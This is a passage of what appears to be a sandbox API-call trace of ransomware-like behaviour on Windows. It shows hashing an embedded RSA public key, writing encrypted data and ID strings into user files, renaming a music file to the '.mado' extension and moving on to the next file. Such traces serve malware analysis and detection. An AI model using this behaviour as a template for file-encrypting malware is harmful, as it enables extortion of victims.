CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.265] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.265] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.265] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.265] GetLastError () returned 0x0 [0204.265] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.265] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.265] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.265] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.265] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.265] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe178 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe160 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bb80 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bc98 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.266] GetCurrentThreadId () returned 0x600 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71240 [0204.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.267] GetCurrentThreadId () returned 0x600 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1a8 [0204.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe178 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe148 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1c0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe190 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe1d8 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe160 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1a8 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1d8 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bdb0 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bec8 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe160 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe190 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe1c0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe178 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe148 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe130 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6e828 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.270] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x187dc, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x187dc, lpOverlapped=0x0) returned 1 [0204.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0204.271] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x187e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.271] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.271] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.271] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.271] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.271] CloseHandle (hObject=0x63c) returned 1 [0204.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.273] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\21GtcRKf ie.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\21gtcrkf ie.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\21GtcRKf ie.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\21gtcrkf ie.wav.mado")) returned 1 [0204.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.273] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.273] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.275] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c5b60, ftCreationTime.dwHighDateTime=0x1d5e202, ftLastAccessTime.dwLowDateTime=0x4730e2f0, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0x4730e2f0, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0xe555, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2PCv7S.mp3", cAlternateFileName="")) returned 1 [0204.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.275] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2PCv7S.mp3") returned=".mp3" [0204.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\2PCv7S.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\2pcv7s.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.275] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=58709) returned 1 [0204.275] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.277] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe52f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.277] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.279] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.279] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe555, lpOverlapped=0x0) returned 1 [0204.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.280] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.280] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.281] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.281] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.281] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, 